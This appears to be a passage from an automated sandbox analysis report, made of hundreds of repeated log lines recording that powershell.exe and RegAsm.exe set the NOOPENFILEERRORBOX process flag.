                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
